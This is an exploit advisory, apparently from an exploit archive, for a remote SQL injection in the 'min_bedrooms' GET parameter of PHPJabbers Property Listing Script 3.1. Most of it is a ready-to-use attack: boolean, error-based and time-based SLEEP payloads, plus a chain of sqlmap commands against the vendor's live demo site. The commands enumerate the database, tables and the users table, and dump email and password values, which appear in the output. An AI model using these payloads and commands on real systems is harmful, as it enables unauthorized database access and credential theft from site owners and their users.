Headline
Property Listing Script 3.1 SQL Injection
Property Listing Script version 3.1 suffers from a remote SQL injection vulnerability.
┌┌────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack… ────┐
┌┌────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr │ │ :
│ Website : phpjabbers.com │ │ │
│ Vendor : PHPJABBERS │ │ Property Listing Script │
│ Software : Property Listing Script 3.1 │ │ │
│ Vuln Type: Remote SQL Injection │ │ Script will give you │
│ Method : GET │ │ the tools to efficiently manage │
│ Critical : High [░░▒▒▓▓██] │ │ your own real estate portal │
│ Impact : Database Access │ │ │
│ │ │ │
│ ────────────────────────────────────────┘ └─────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
loool, DevS, Dark-Gost
CryptoJob (Twitter) twitter.com/CryptozJob
┌┌────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└────────────────────────────────────────────────────────────────────────────────────┘┘
Live Demo Site:
https://www.phpjabbers.com/property-listing-script/#sectionDemo
[INFO] GET parameter ‘min_bedrooms’ appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
GET parameter ‘min_bedrooms’ is vulnerable.
sqlmap identified the following injection point(s) with a total of 414 HTTP(s) requests:
Parameter: min_bedrooms (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND 7719=7719 AND (2759=2759
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x716b627171,(SELECT (ELT(3030=3030,1))),0x71626a7871),3030) AND (5977=5977
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND (SELECT 2245 FROM (SELECT(SLEEP(5)))iJfC) AND (1861=1861
sqlmap.py -u “https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1” --current-db --batch --random-agent --threads 5
[INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: Apache 2.2.15
back-end DBMS: MySQL >= 5.6
[01:13:36] [INFO] fetching current database
[01:13:36] [INFO] retrieved: ‘pjabbers_demo_pls’
current database: ‘pjabbers_demo_pls’
sqlmap.py -u “https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1” -D pjabbers_demo_pls --tables --batch --random-agent
Parameter: min_bedrooms (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND 7719=7719 AND (2759=2759
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x716b627171,(SELECT (ELT(3030=3030,1))),0x71626a7871),3030) AND (5977=5977
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND (SELECT 2245 FROM (SELECT(SLEEP(5)))iJfC) AND (1861=1861
[INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: Apache 2.2.15
back-end DBMS: MySQL >= 5.6
Database: pjabbers_demo_pls
[66 tables]
±---------------------------------------------------------------+
| 1657528735_303_pls_30_property_listing_features |
| 1657528735_303_pls_30_property_listing_fields |
| 1657528735_303_pls_30_property_listing_multi_lang |
| 1657528735_303_pls_30_property_listing_options |
| 1657528735_303_pls_30_property_listing_passwords |
| 1657528735_303_pls_30_property_listing_payments |
| 1657528735_303_pls_30_property_listing_periods |
| 1657528735_303_pls_30_property_listing_plugin_country |
| 1657528735_303_pls_30_property_listing_plugin_galleries_set |
| 1657528735_303_pls_30_property_listing_plugin_gallery |
| 1657528735_303_pls_30_property_listing_plugin_locale_languages |
| 1657528735_303_pls_30_property_listing_plugin_locale |
| 1657528735_303_pls_30_property_listing_plugin_log_config |
| 1657528735_303_pls_30_property_listing_plugin_log |
| 1657528735_303_pls_30_property_listing_plugin_one_admin |
| 1657528735_303_pls_30_property_listing_plugin_paypal |
| 1657528735_303_pls_30_property_listing_plugin_sms |
| 1657528735_303_pls_30_property_listing_properties_features |
| 1657528735_303_pls_30_property_listing_properties |
| 1657528735_303_pls_30_property_listing_roles |
| 1657528735_303_pls_30_property_listing_types |
| 1657528735_303_pls_30_property_listing_users |
| 1657921261_148_pls_30_property_listing_features |
| 1657921261_148_pls_30_property_listing_fields |
| 1657921261_148_pls_30_property_listing_multi_lang |
| 1657921261_148_pls_30_property_listing_options |
| 1657921261_148_pls_30_property_listing_passwords |
| 1657921261_148_pls_30_property_listing_payments |
| 1657921261_148_pls_30_property_listing_periods |
| 1657921261_148_pls_30_property_listing_plugin_country |
| 1657921261_148_pls_30_property_listing_plugin_galleries_set |
| 1657921261_148_pls_30_property_listing_plugin_gallery |
| 1657921261_148_pls_30_property_listing_plugin_locale_languages |
| 1657921261_148_pls_30_property_listing_plugin_locale |
| 1657921261_148_pls_30_property_listing_plugin_log_config |
| 1657921261_148_pls_30_property_listing_plugin_log |
| 1657921261_148_pls_30_property_listing_plugin_one_admin |
| 1657921261_148_pls_30_property_listing_plugin_paypal |
| 1657921261_148_pls_30_property_listing_plugin_sms |
| 1657921261_148_pls_30_property_listing_properties_features |
| 1657921261_148_pls_30_property_listing_properties |
| 1657921261_148_pls_30_property_listing_roles |
| 1657921261_148_pls_30_property_listing_types |
| 1657921261_148_pls_30_property_listing_users |
| pls_30_property_listing_features |
| pls_30_property_listing_fields |
| pls_30_property_listing_multi_lang |
| pls_30_property_listing_options |
| pls_30_property_listing_passwords |
| pls_30_property_listing_payments |
| pls_30_property_listing_periods |
| pls_30_property_listing_plugin_country |
| pls_30_property_listing_plugin_galleries_set |
| pls_30_property_listing_plugin_gallery |
| pls_30_property_listing_plugin_locale |
| pls_30_property_listing_plugin_locale_languages |
| pls_30_property_listing_plugin_log |
| pls_30_property_listing_plugin_log_config |
| pls_30_property_listing_plugin_one_admin |
| pls_30_property_listing_plugin_paypal |
| pls_30_property_listing_plugin_sms |
| pls_30_property_listing_properties |
| pls_30_property_listing_properties_features |
| pls_30_property_listing_roles |
| pls_30_property_listing_types |
| pls_30_property_listing_users |
±---------------------------------------------------------------+
sqlmap.py -u “https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1” -D pjabbers_demo_pls -T pls_30_property_listing_users --columns --batch --random-agent
fetching columns for table ‘pls_30_property_listing_users’ in database ‘pjabbers_demo_pls’
Database: pjabbers_demo_pls
Table: pls_30_property_listing_users
[12 columns]
±-----------±-----------------+
| Column | Type |
±-----------±-----------------+
| created | datetime |
| email | varchar(255) |
| fax | varchar(255) |
| id | int(10) unsigned |
| ip | varchar(15) |
| is_active | enum(‘T’,’F’) |
| last_login | datetime |
| name | varchar(255) |
| password | blob |
| phone | varchar(255) |
| role_id | int(10) unsigned |
| status | enum(‘T’,’F’) |
±-----------±-----------------+
sqlmap.py -u “https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1” -D pjabbers_demo_pls -T pls_30_property_listing_users -C email,password --dump --batch --random-agent
fetching entries of column(s) ‘email,password’ for table ‘pls_30_property_listing_users’ in database ‘pjabbers_demo_pls’
Database: pjabbers_demo_pls
Table: pls_30_property_listing_users
[1 entry]
±----------------±---------+
| email | password |
±----------------±---------+
| [email protected] | P@S13rd |
±----------------±---------+
[-] Done